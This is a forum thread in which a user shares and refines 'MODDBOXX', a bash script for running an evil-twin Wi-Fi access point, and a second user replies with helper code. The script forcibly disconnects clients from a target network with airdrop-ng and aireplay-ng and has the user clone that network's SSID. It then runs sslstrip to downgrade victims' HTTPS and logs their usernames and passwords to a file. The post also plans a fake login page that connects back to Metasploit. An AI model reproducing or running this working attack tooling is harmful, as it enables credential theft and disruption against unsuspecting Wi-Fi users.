Results 1 to 3 of 3

Thread: Seeking advice on my moddboxx port forwarding script

  1. #1
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    2

    Default Seeking advice on my moddboxx port forwarding script

    The object of this script is to automate running an evil access point (ie MODDBOXX). You connect your ethernet port to the WAN port on your ap and then moddboxx......
    1. Sets up dhcp for WAN port of the ap (works)
    2. Changes your wlan0 mac address (works)
    3. starts sslstrip / ettercap for mitm (sslstrip works great / ettercap not implemented yet)
    4. starts radius server w/ an "evil" anon "Free Wifi" login prompt that connects back to metasploit (not finished yet)
    5. opens various konsoles so that files / connections can be monitored in real time (works)
    6. automates airdrop-ng to drop clients from other ap's (works okay on 1 card.. would be better with 2)

    I had to move the script to the reply. It's almost too long for one post. Doh!

    UPDATES:
    1. Setting mac on iface to allow a static entry in airdrop's droprules.conf works now

    2. Fixed airdrop. If we set airodump on 1 channel and then run airdrop -s 30 (for every 30 seconds) it's enough to *encourage* clients to connect without overloading the card so we can still have internet access. Would be MUCH better with two cards I think but it functions on just one. The script would have to be edited to allow for two cards.

    3. Added aireplay-ng to deauth clients as well. Currently it only runs once but I'm going to try to find a way to loop it where you can select target mac, send a few deauth packets, then select another mac, so on and so forth.

    4. Tailing sslstrip so you can see info coming in. Still have NOT fixed grepping out the domain/username/password. Right now we grep out any secure posts, which sslstrip does on its own, but I wanted to set it up where as much info was captured as possible and important info was then grep/awk/sed into a separate txt file. It is actually pretty easy to read through the secure posts though. Still would like to refine it anyway.

    5. Script checks to see if mon0 is already up. If yes then it does nothing, if no it enables monitor mode. This was a big deal because if you ran the script 2,3, or 4 times you'd end up with mon1,mon2, ect. and that was annoying.

    Things I'm working on / need help with........

    1. Trying to setup an http redirect or something where the first time a user logs on they have to go to a "accept terms and conditions page" and after they accept then they can access the WAN. Not really sure how to do that yet. Freeradius seems like it may be a solution however I'm not sure that it's really necessary.

    2. The grep >> pass.txt needs to be refined. I have it set up where it logs logins and passwords but they are not assosiated so you kind of have to pick and match.... that needs some fixin.

    3. Would like to set up a trap (I think it's a trap?) to rm any tmp files when the script exits. ex: droprulesmod.conf / tmp.txt

    4. When airodump starts it appends a "0-1" to the end of the capture file... which is fine. What I'd like to do is have the script use the latest one for airdrop. It is currently static and just uses "capture-01.csv" but if this is the second time ( or 3rd 4th ect) that airodump has run in that dir moddboxx still uses "0-1" for airdrop.

    5. Lots of other stuff I'd like to add that I'll get to eventually.
    Last edited by lithiumr1; 03-22-2010 at 07:30 AM. Reason: updates

  2. #2
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    2

    Default updated script

    Code:
    #!/bin/bash
    #moddboxx evil ap script
    #script written by lithiumr1@gmail.com
    clear
    echo -e -n "\n \n"
    echo -e -n "          :::::::::::::::::::::::::::::::::MODDBOXX:::::::::::::::::::::::::::::::::: \n"
    echo -e -n "                               Script by LithiumR1 Copywrong 2010 \n"
    echo -e -n "                                      Version .01 Beta \n \n"
    
    echo -e -n "\n Interface to connect to the internet?: "
    read -e IFNET
    
    echo -n -e "\n Change mac for $IFNET (required for airdrop)? y/n: "
    read -e IFNETMACCHANGE
    
    if [ "$IFNETMACCHANGE" = "y" ]; then
    echo -e -n "\n Changing mac for $IFNET ..............\n"
    ifconfig $IFNET down
    macchanger -m 00:11:22:33:44:55 $IFNET #this mac is static so that we can leave it in the allow list for airdrop
    ifconfig $IFNET up
    sleep 1
    ifup wlan0 &
    sleep 5
    echo -e -n "\n If you were previously connected to the internet on $IFNET you may need to reconnect! \n"
    fi
    
    echo -n -e "\n Choose a number for deauth tool: \n 1. Airdrop-ng \n 2. Aireplay-ng  \n 3. Nothing \n :"
    read -e DEAUTH
    
    if [ "$DEAUTH" = "1" ]; then
    airmon-ng |grep -Eo "mon0" > tmp.txt
    read -e MON < tmp.txt
    rm tmp.txt
    echo -e -n "\n What interface for airodump?: "
    read -e IFDUMP	
    
    	if [ "$MON" = "mon0" ]; then
    	echo -e -n "\n Monitor mode is already enabled on $IFDUMP \n"
    	else
    	echo -e -n "\n Enabling monitor mode......... \n"
    	airmon-ng start $IFDUMP 
    	fi
    
    echo -e -n "\n Listing access points within range............. \n"
    iwlist $IFDUMP scanning |grep -E "(ESSID|Address|Channel:)"
    echo -e -n "\n What channel is the target ap on?: "
    read -e CHANNEL
    echo -e -n "\n What is the target ap's mac address?: "
    read -e TMAC
    echo -e -n "\n Creating rules for airdrop.......... \n"
    touch droprulesmod.conf
    echo "a/any|00:11:22:33:44:55" > droprulesmod.conf #this is why we set the static mac for wlan0 rather than --random
    echo "d/$TMAC|any" >> droprulesmod.conf #I'd like to create a loop in another konsole that scans so you can add more target macs 
    
    echo -e -n "\n Starting airodump on mon0..............\n"
    konsole --noframe --notabbar --nomenubar --notoolbar -e airodump-ng -w capture -c $CHANNEL --output-format csv mon0 &
    fi
    
    if [ "$DEAUTH" = "2" ]; then
    airmon-ng |grep -Eo "mon0" > tmp.txt
    read -e MON < tmp.txt
    rm tmp.txt
    echo -e -n "\n What interface for airodump?: "
    read -e IFDUMP	
    
    	if [ "$MON" = "mon0" ]; then
    	echo -e -n "\n Monitor mode is already enabled on $IFDUMP \n"
    	else
    	echo -e -n "\n Enabling monitor mode......... \n"
    	airmon-ng start $IFDUMP 
    	fi
    
    echo -e -n "\n Listing access points within range............. \n"
    iwlist $IFDUMP scanning |grep -E "(ESSID|Address|Channel:)"
    echo -e -n "\n What channel is the target ap on?: "
    read -e CHANNEL
    
    echo -e -n "\n What is the target ap's mac address?: "
    read -e TMAC
    
    echo -e -n "\n Starting airodump on mon0..............\n"
    konsole --noframe --notabbar --nomenubar --notoolbar -e airodump-ng -w capture -c $CHANNEL --output-format csv mon0 &
    fi
    
    echo -e -n "\n Start dhcp for eth0? y/n: "
    read -e DHCP
    
    if [ "$DHCP" = "y" ]; then
    echo -e -n "\n Taking eth0 down...........\n"
    ifconfig eth0 down
    sleep 2
    
    echo -e -n "\n Bringing eth0 back up............\n"
    ifconfig eth0 up
    sleep 1
    
    echo -e -n "\n Setting ipaddress and netmask on eth0..........\n"
    ifconfig eth0 10.0.0.1 netmask 255.255.255.0
    sleep 1
    
    echo -e -n "\n Starting dhcp for eth0................\n"
    touch /var/run/dhcpd.pid
    chown dhcpd:dhcpd /var/run/dhcpd.pid
    konsole --geometry 645x25+0+175 --noframe --notabbar --nomenubar --notoolbar -e dhcpd3 -d -f -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid &
    sleep 1 #depends on how long it takes for your AP to get an IP.... mine is pretty fast
    
    echo -e -n "\n Temporarily disabling routing............\n"
    echo 0 > /proc/sys/net/ipv4/ip_forward
    
    echo -e -n "\n Temporarily blocking all traffic................\n"
    iptables -P OUTPUT DROP
    iptables -P INPUT DROP
    iptables -P FORWARD DROP
    
    echo -e -n "\n Deleting/Flushing old iptables rules..............\n"
    iptables -F
    iptables -t nat -F
    iptables -t mangle -F
    iptables -X
    sleep 1
    
    echo -e -n "\n Setting default ALLOW policies..................\n"
    iptables -P OUTPUT ACCEPT
    iptables -P INPUT ACCEPT
    iptables -P FORWARD ACCEPT
    
    echo -e -n "\n Allowing local loopback [NEEDED?].................\n"
    iptables -A INPUT -i lo -j ACCEPT
    
    echo -e -n "\n Allowing pings [OPTIONAL].............\n"
    iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT
    iptables -A FORWARD -p icmp --icmp-type echo-request -j ACCEPT
    
    
    ############ STATE STUFF ############
    echo -e -n "\n Accepting existing connections [NEEDED]................\n"
    iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
    sleep 1
    
    # Allow any new conections from internal network
    # [ONLY NEEDED IF PORTS ARE NOT EXPLITLY FORWARDED BELOW]
    #iptables -A INPUT -m state --state NEW -i eth0 -j ACCEPT
    #####################################
    
    echo -e -n "\n Setting externally accessable inbound services [OPTIONAL]...............\n"
    echo -e -n " You may want to disable Bittorrent ports on large networks.\n"
    iptables -A INPUT -p tcp --dport 44444 -m state --state NEW -j ACCEPT #SSH
    iptables -A INPUT -p tcp -i wlan0 --dport 23232 -m state --state NEW -j ACCEPT #Bittorrent
    iptables -A INPUT -p udp -i wlan0 --dport 23232 -m state --state NEW -j ACCEPT #Bittorrent
    
    echo -e -n "\n Setting internal inbound services [OPTIONAL - DNS NEEDED]..............\n"
    iptables -A INPUT -p udp -i eth0 --dport 53 -m state --state NEW -j ACCEPT #DNS cache
    iptables -A INPUT -p tcp -i eth0 --dport 53 -m state --state NEW -j ACCEPT #DNS cache
    iptables -A INPUT -p udp -i eth0 --dport 137:139 -m state --state NEW -j ACCEPT #SAMBA
    iptables -A INPUT -p tcp -i eth0 --dport 445 -m state --state NEW -j ACCEPT #SAMBA
    
    echo -e -n "\n Allowing forwarding of essential services..............\n"
    iptables -A FORWARD -p tcp --dport 80 -j ACCEPT #WEB
    iptables -A FORWARD -p tcp --dport 443 -j ACCEPT #HTTPS
    
    echo -e -n "\n Setting masquerade on wlan0...............\n"
    iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
    
    echo -e -n "\n Enabling ip_forwarding...............\n"
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    fi
    
    echo -e -n "\n ::::::::::::::::Log into your AP and set the SSID to match the target ap:::::::::::::::\n"
    echo -e -n " Press ENTER when you are done: "
    read -e
    echo -e -n "\n Choose your mitm tool: \n 1. Sslstrip \n 2. Ettercap (not there yet) \n 3. Nothing \n : "
    read -e STRIPPERS1 #Yay for Strippers!! ;)
    
    echo -e -n "\n Use urlsnarf? y/n: "
    read -e URLSNARF
    
    echo -e -n "\n Tcptrack is NOT installed on BT4 by default.\n"
    echo -e -n " apt-get install tcptrack if you want it. \n"
    echo -e -n " Use tcptrack? y/n: "
    read -e TCPTRACK
    
    if [ "$STRIPPERS1" = "1" ]; then
    echo -e -n "\n Redirecting for sslstrip ;)...............\n"
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
    
    echo -e -n "\n Starting sslstrip.............\n"
    konsole --geometry 645x200+0+321 --noframe --notabbar --nomenubar --notoolbar -e sslstrip -a -l 8080 &
    sleep 2
    
    echo -e -n "\n Staring Tail to watch sslstrip.log (it's cool to watch stuff flow in)........... \n"
    konsole --geometry 645x200+0+321 --noframe --notabbar --nomenubar --notoolbar -e tail -f -s 1 -v sslstrip.log &
    
    echo -e -n "\n Logging *some* common passwords like facebook, gmail, ect. to pass.txt \n"
    echo -e -n " Not all passwords will be logged to this file so you may wish to look manually. \n"
    echo -e -n " If anyone has a better way to do this let me know!!!\n"
    tail -f -s 1 -v sslstrip.log |grep -Eo "(user|login|pass|passwd|password|pwd)=[0-9A-z._-]*" >> pass.txt &
    tail -f -s 1 -v sslstrip.log |grep -B 0 -A 1 "SECURE POST data" >> securepostdata.log &
    fi
    
    if [ "$STRIPPERS1" = "2" ]; then
    echo -e -n "\n Sorry, I haven't added ettercap to the script yet :( \n" # But this is where it will go when I do!!
    fi
    
    if [ "$URLSNARF" = "y" ]; then
    echo -e -n "\n Starting urlsnarf............ \n"
    konsole --geometry 645x200+0+548 --noframe --notabbar --nomenubar --notoolbar -e urlsnarf -i eth0 &
    fi
    
    if [ "$TCPTRACK" = "y" ]; then
    echo -n -e "\n Starting tcptrack.......... \n"
    konsole --geometry 645x800+800+0 --noframe --notabbar --nomenubar --notoolbar -e tcptrack -i wlan0 &
    fi
    
    if [ "$DEAUTH" = "1" ]; then
    
    echo -n -e "\n You really need 2 cards for this and airodump needs to have been running for a while. \n"
    
    echo -n -e "\n Starting airdrop...... \n"
    sleep 20
    konsole --geometry 645x25+0+175 --noframe --notabbar --nomenubar --notoolbar -e airdrop-ng -i mon0 -t capture-01.csv -r droprulesmod.conf -s 30 &
    sleep 5
    ps -A |grep -Eo "airdrop-ng" > tmp.txt
    read -e TMP < tmp.txt
    rm tmp.txt
    	if [ "$TMP" = "airdrop-ng" ]; then
    	echo -e -n "\n Airdrop running \n"
    	else
    	echo -e -n "\n Airdrop failed... probably due to not having any client macs from airodump. \n You can try it manually in a few minutes. \n"
    	fi
    fi
    
    if [ "$DEAUTH" = "2" ]; then
    echo -e -n "\n Listing client macs............. \n"
    cat capture-01.csv |grep -B 0 -A 25 "Station MAC"
    echo -e -n "\n What is the client mac address to deauth?: "
    read -e CMAC
    echo -e -n "\n How many deauth packets would you like to send? "
    read -e PCKNUM
    aireplay-ng -a $TMAC -c $CMAC -0 $PCKNUM mon0
    fi
    
    
    echo -n -e "\n \n"
    echo -n -e "        If you set up chilispot on your ap (I use dd wrt) don't forget to start SET!!\n"
    echo -n -e "   :::::::::::::::::::::::MODDBOXX finished. Have a Great day!!!::::::::::::::::::::::::::::: \n"
    Last edited by lithiumr1; 03-22-2010 at 07:34 AM.

  3. #3
    Member CKing's Avatar
    Join Date
    Mar 2010
    Location
    downtown, riverfront
    Posts
    83

    Default Re: Seeking advice on my moddboxx port forwarding script

    Why not use the date instaed of capture for the name that airodump outputs? This would help organize as well if you wanted to keep the cap files for some reason.
    It would look like:

    Code:
    NOW=$(date +"-%b-%d-%y-%H%M%S")
    airodump-ng mon0 -w /tmpdirpath/$NOW
    Then you can point airdrop to $NOW-01.csv

    Your trap would look like:

    Code:
    trap cleanup INT
    function cleanup ()
    {	rm /tmpdirpath/filestodelete
    	killall whatever is running
    	airmon-ng stop mon0
    	whatever else you want
    	exit 1
    }
    Let me know if you figure out that redirect thing for a terms of use page im interested in seeing how that would work. I think airsnarf did something similar so you might wanna check out how that was written.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •